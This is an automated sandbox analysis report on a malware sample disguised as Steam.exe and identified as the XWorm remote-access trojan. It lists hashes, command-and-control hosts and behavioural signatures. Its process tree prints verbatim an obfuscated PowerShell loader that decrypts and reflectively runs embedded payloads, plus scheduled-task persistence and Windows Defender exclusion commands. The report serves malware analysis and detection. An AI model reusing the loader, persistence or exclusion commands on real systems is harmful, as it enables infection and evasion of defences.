Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
1050s -
max time network
1053s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system -
submitted
08/08/2024, 10:04
Behavioral task
behavioral1
Sample
Steam.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
Steam.exe
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
Steam.exe
Resource
win10v2004-20240802-en
General
-
Target
Steam.exe
-
Size
51KB
-
MD5
eb794f3819b32c9fbc747309bb04cd68
-
SHA1
a6c24bfb6c2ea4cdf10f0f54c0a4e8ac0380beb3
-
SHA256
e8fd34b40b83391a855905620e4beeb153d256df196b063bc7845d747f1e7d67
-
SHA512
0b6cf31c799513b4e0f5ac21180cc7a26451fc54504f03ace353a5a8c598885c594b3375e990ac442e08ffaa1f3e9692cbf6dfb8c035b4380497cefd57288aaf
-
SSDEEP
768:juMMmVn76G3rspEacCIQgttZX+2V2ltnq7oTmggkbm1t+tuXSWCalOIhu//t/:SMDnv7sKEIHLXyBqCmjkbmn/weOImF/
Malware Config
Extracted
xworm
tree-cleaning.gl.at.ply.gg:33027
hard-tyler.gl.at.ply.gg:27490
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 5 IoCs
resource yara_rule behavioral4/memory/3568-0-0x0000000000500000-0x0000000000514000-memory.dmp family_xworm behavioral4/memory/4572-22-0x00000200A4B10000-0x00000200A4BB6000-memory.dmp family_xworm behavioral4/memory/888-53-0x000002AE2EAF0000-0x000002AE2EB40000-memory.dmp family_xworm behavioral4/files/0x000200000002aa57-56.dat family_xworm behavioral4/memory/1200-64-0x0000000000370000-0x00000000003BE000-memory.dmp family_xworm -
Blocklisted process makes network request 3 IoCs
flow pid Process 34 888 powershell.exe 36 888 powershell.exe 38 888 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4624 powershell.exe 4688 powershell.exe 1556 powershell.exe 5036 powershell.exe 3368 powershell.exe 840 powershell.exe 2272 powershell.exe 2528 powershell.exe 1320 powershell.exe 888 powershell.exe 4572 powershell.exe -
Drops startup file 3 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\systemprocess.lnk powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\systemprocess.lnk XClient.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\systemprocess.lnk powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 1200 XClient.exe 5608 qvhxlm.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Run\systemprocess = "C:\\Users\\Admin\\AppData\\Local\\Temp\\systemprocess.exe" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Run\systemprocess = "C:\\Users\\Admin\\AppData\\Local\\Temp\\systemprocess.exe" XClient.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 3 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qvhxlm.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 8 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949 msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\DisplayName = "Chrome Sandbox" msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Moniker = "cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe" msedge.exe Key created \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Children msedge.exe Key created \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage msedge.exe Key created \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe msedge.exe Key created \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe\Children msedge.exe -
Suspicious behavior: EnumeratesProcesses 37 IoCs
pid Process 4572 powershell.exe 4572 powershell.exe 1320 powershell.exe 1320 powershell.exe 888 powershell.exe 888 powershell.exe 3368 powershell.exe 3368 powershell.exe 840 powershell.exe 840 powershell.exe 2272 powershell.exe 2272 powershell.exe 2528 powershell.exe 2528 powershell.exe 4624 powershell.exe 4624 powershell.exe 4688 powershell.exe 4688 powershell.exe 1556 powershell.exe 1556 powershell.exe 5036 powershell.exe 5036 powershell.exe 888 powershell.exe 1200 XClient.exe 4800 msedge.exe 4800 msedge.exe 1180 msedge.exe 1180 msedge.exe 3740 msedge.exe 3740 msedge.exe 4768 identity_helper.exe 4768 identity_helper.exe 4192 msedge.exe 2176 msedge.exe 2176 msedge.exe 2176 msedge.exe 2176 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 19 IoCs
pid Process 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3568 Steam.exe Token: SeDebugPrivilege 4572 powershell.exe Token: SeDebugPrivilege 1320 powershell.exe Token: SeIncreaseQuotaPrivilege 1320 powershell.exe Token: SeSecurityPrivilege 1320 powershell.exe Token: SeTakeOwnershipPrivilege 1320 powershell.exe Token: SeLoadDriverPrivilege 1320 powershell.exe Token: SeSystemProfilePrivilege 1320 powershell.exe Token: SeSystemtimePrivilege 1320 powershell.exe Token: SeProfSingleProcessPrivilege 1320 powershell.exe Token: SeIncBasePriorityPrivilege 1320 powershell.exe Token: SeCreatePagefilePrivilege 1320 powershell.exe Token: SeBackupPrivilege 1320 powershell.exe Token: SeRestorePrivilege 1320 powershell.exe Token: SeShutdownPrivilege 1320 powershell.exe Token: SeDebugPrivilege 1320 powershell.exe Token: SeSystemEnvironmentPrivilege 1320 powershell.exe Token: SeRemoteShutdownPrivilege 1320 powershell.exe Token: SeUndockPrivilege 1320 powershell.exe Token: SeManageVolumePrivilege 1320 powershell.exe Token: 33 1320 powershell.exe Token: 34 1320 powershell.exe Token: 35 1320 powershell.exe Token: 36 1320 powershell.exe Token: SeIncreaseQuotaPrivilege 1320 powershell.exe Token: SeSecurityPrivilege 1320 powershell.exe Token: SeTakeOwnershipPrivilege 1320 powershell.exe Token: SeLoadDriverPrivilege 1320 powershell.exe Token: SeSystemProfilePrivilege 1320 powershell.exe Token: SeSystemtimePrivilege 1320 powershell.exe Token: SeProfSingleProcessPrivilege 1320 powershell.exe Token: SeIncBasePriorityPrivilege 1320 powershell.exe Token: SeCreatePagefilePrivilege 1320 powershell.exe Token: SeBackupPrivilege 1320 powershell.exe Token: SeRestorePrivilege 1320 powershell.exe Token: SeShutdownPrivilege 1320 powershell.exe Token: SeDebugPrivilege 1320 powershell.exe Token: SeSystemEnvironmentPrivilege 1320 powershell.exe Token: SeRemoteShutdownPrivilege 1320 powershell.exe Token: SeUndockPrivilege 1320 powershell.exe Token: SeManageVolumePrivilege 1320 powershell.exe Token: 33 1320 powershell.exe Token: 34 1320 powershell.exe Token: 35 1320 powershell.exe Token: 36 1320 powershell.exe Token: SeIncreaseQuotaPrivilege 1320 powershell.exe Token: SeSecurityPrivilege 1320 powershell.exe Token: SeTakeOwnershipPrivilege 1320 powershell.exe Token: SeLoadDriverPrivilege 1320 powershell.exe Token: SeSystemProfilePrivilege 1320 powershell.exe Token: SeSystemtimePrivilege 1320 powershell.exe Token: SeProfSingleProcessPrivilege 1320 powershell.exe Token: SeIncBasePriorityPrivilege 1320 powershell.exe Token: SeCreatePagefilePrivilege 1320 powershell.exe Token: SeBackupPrivilege 1320 powershell.exe Token: SeRestorePrivilege 1320 powershell.exe Token: SeShutdownPrivilege 1320 powershell.exe Token: SeDebugPrivilege 1320 powershell.exe Token: SeSystemEnvironmentPrivilege 1320 powershell.exe Token: SeRemoteShutdownPrivilege 1320 powershell.exe Token: SeUndockPrivilege 1320 powershell.exe Token: SeManageVolumePrivilege 1320 powershell.exe Token: 33 1320 powershell.exe Token: 34 1320 powershell.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
pid Process 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe -
Suspicious use of SendNotifyMessage 12 IoCs
pid Process 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe 1180 msedge.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 888 powershell.exe 1200 XClient.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3568 wrote to memory of 4172 3568 Steam.exe 83 PID 3568 wrote to memory of 4172 3568 Steam.exe 83 PID 4172 wrote to memory of 4572 4172 cmd.exe 85 PID 4172 wrote to memory of 4572 4172 cmd.exe 85 PID 4572 wrote to memory of 1320 4572 powershell.exe 86 PID 4572 wrote to memory of 1320 4572 powershell.exe 86 PID 4572 wrote to memory of 2752 4572 powershell.exe 88 PID 4572 wrote to memory of 2752 4572 powershell.exe 88 PID 2752 wrote to memory of 4004 2752 WScript.exe 89 PID 2752 wrote to memory of 4004 2752 WScript.exe 89 PID 4004 wrote to memory of 888 4004 cmd.exe 91 PID 4004 wrote to memory of 888 4004 cmd.exe 91 PID 888 wrote to memory of 1200 888 powershell.exe 92 PID 888 wrote to memory of 1200 888 powershell.exe 92 PID 888 wrote to memory of 3368 888 powershell.exe 93 PID 888 wrote to memory of 3368 888 powershell.exe 93 PID 1200 wrote to memory of 840 1200 XClient.exe 95 PID 1200 wrote to memory of 840 1200 XClient.exe 95 PID 888 wrote to memory of 2272 888 powershell.exe 97 PID 888 wrote to memory of 2272 888 powershell.exe 97 PID 1200 wrote to memory of 2528 1200 XClient.exe 99 PID 1200 wrote to memory of 2528 1200 XClient.exe 99 PID 888 wrote to memory of 4624 888 powershell.exe 101 PID 888 wrote to memory of 4624 888 powershell.exe 101 PID 1200 wrote to memory of 4688 1200 XClient.exe 103 PID 1200 wrote to memory of 4688 1200 XClient.exe 103 PID 888 wrote to memory of 1556 888 powershell.exe 105 PID 888 wrote to memory of 1556 888 powershell.exe 105 PID 1200 wrote to memory of 5036 1200 XClient.exe 107 PID 1200 wrote to memory of 5036 1200 XClient.exe 107 PID 3568 wrote to memory of 1180 3568 Steam.exe 109 PID 3568 wrote to memory of 1180 3568 Steam.exe 109 PID 1180 wrote to memory of 2996 1180 msedge.exe 110 PID 1180 wrote to memory of 2996 1180 msedge.exe 110 PID 1180 wrote to memory of 3076 1180 msedge.exe 111 PID 1180 wrote to memory of 3076 1180 msedge.exe 111 PID 1180 wrote to memory of 3076 1180 msedge.exe 111 PID 1180 wrote to memory of 3076 1180 msedge.exe 111 PID 1180 wrote to memory of 3076 1180 msedge.exe 111 PID 1180 wrote to memory of 3076 1180 msedge.exe 111 PID 1180 wrote to memory of 3076 1180 msedge.exe 111 PID 1180 wrote to memory of 3076 1180 msedge.exe 111 PID 1180 wrote to memory of 3076 1180 msedge.exe 111 PID 1180 wrote to memory of 3076 1180 msedge.exe 111 PID 1180 wrote to memory of 3076 1180 msedge.exe 111 PID 1180 wrote to memory of 3076 1180 msedge.exe 111 PID 1180 wrote to memory of 3076 1180 msedge.exe 111 PID 1180 wrote to memory of 3076 1180 msedge.exe 111 PID 1180 wrote to memory of 3076 1180 msedge.exe 111 PID 1180 wrote to memory of 3076 1180 msedge.exe 111 PID 1180 wrote to memory of 3076 1180 msedge.exe 111 PID 1180 wrote to memory of 3076 1180 msedge.exe 111 PID 1180 wrote to memory of 3076 1180 msedge.exe 111 PID 1180 wrote to memory of 3076 1180 msedge.exe 111 PID 1180 wrote to memory of 3076 1180 msedge.exe 111 PID 1180 wrote to memory of 3076 1180 msedge.exe 111 PID 1180 wrote to memory of 3076 1180 msedge.exe 111 PID 1180 wrote to memory of 3076 1180 msedge.exe 111 PID 1180 wrote to memory of 3076 1180 msedge.exe 111 PID 1180 wrote to memory of 3076 1180 msedge.exe 111 PID 1180 wrote to memory of 3076 1180 msedge.exe 111 PID 1180 wrote to memory of 3076 1180 msedge.exe 111 PID 1180 wrote to memory of 3076 1180 msedge.exe 111 PID 1180 wrote to memory of 3076 1180 msedge.exe 111
Processes
-
C:\Users\Admin\AppData\Local\Temp\Steam.exe"C:\Users\Admin\AppData\Local\Temp\Steam.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3568 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sskcez.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:4172 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('s3PmOFekrbMURG659b9KZABAZEot2P8QYsLMjAdvpMI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5PDYrt8bAJlfBVhSQkNwKQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $RVXUV=New-Object System.IO.MemoryStream(,$param_var); $qosdf=New-Object System.IO.MemoryStream; $HODhe=New-Object System.IO.Compression.GZipStream($RVXUV, [IO.Compression.CompressionMode]::Decompress); $HODhe.CopyTo($qosdf); $HODhe.Dispose(); $RVXUV.Dispose(); $qosdf.Dispose(); $qosdf.ToArray();}function execute_function($param_var,$param2_var){ $uFPjJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sKYTA=$uFPjJ.EntryPoint; $sKYTA.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\sskcez.bat';$zWgVI=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\sskcez.bat').Split([Environment]::NewLine);foreach ($GBYgo in $zWgVI) { if ($GBYgo.StartsWith(':: ')) { $yuPZQ=$GBYgo.Substring(3); break; }}$payloads_var=[string[]]$yuPZQ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4572 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_812_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_812.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1320
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_812.vbs"4⤵
- Suspicious use of WriteProcessMemory
PID:2752 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_812.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:4004 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('s3PmOFekrbMURG659b9KZABAZEot2P8QYsLMjAdvpMI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5PDYrt8bAJlfBVhSQkNwKQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $RVXUV=New-Object System.IO.MemoryStream(,$param_var); $qosdf=New-Object System.IO.MemoryStream; $HODhe=New-Object System.IO.Compression.GZipStream($RVXUV, [IO.Compression.CompressionMode]::Decompress); $HODhe.CopyTo($qosdf); $HODhe.Dispose(); $RVXUV.Dispose(); $qosdf.Dispose(); $qosdf.ToArray();}function execute_function($param_var,$param2_var){ $uFPjJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sKYTA=$uFPjJ.EntryPoint; $sKYTA.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_812.bat';$zWgVI=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_812.bat').Split([Environment]::NewLine);foreach ($GBYgo in $zWgVI) { if ($GBYgo.StartsWith(':: ')) { $yuPZQ=$GBYgo.Substring(3); break; }}$payloads_var=[string[]]$yuPZQ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:888 -
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"7⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1200 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:840
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\systemprocess.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4688
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'systemprocess.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5036
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://guns,lol/serc8⤵PID:1876
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff828a23cb8,0x7ff828a23cc8,0x7ff828a23cd89⤵PID:4580
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://guns.lol/serc8⤵PID:2352
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ff828a23cb8,0x7ff828a23cc8,0x7ff828a23cd89⤵PID:700
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3368
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2272
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\systemprocess.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4624
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'systemprocess.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://guns,lol/serc7⤵PID:3812
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff828a23cb8,0x7ff828a23cc8,0x7ff828a23cd88⤵PID:2184
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://guns.lol/serc7⤵PID:1768
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff828a23cb8,0x7ff828a23cc8,0x7ff828a23cd88⤵PID:3988
-
-
-
-
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://guns.lol/tuesday.cs2⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1180 -
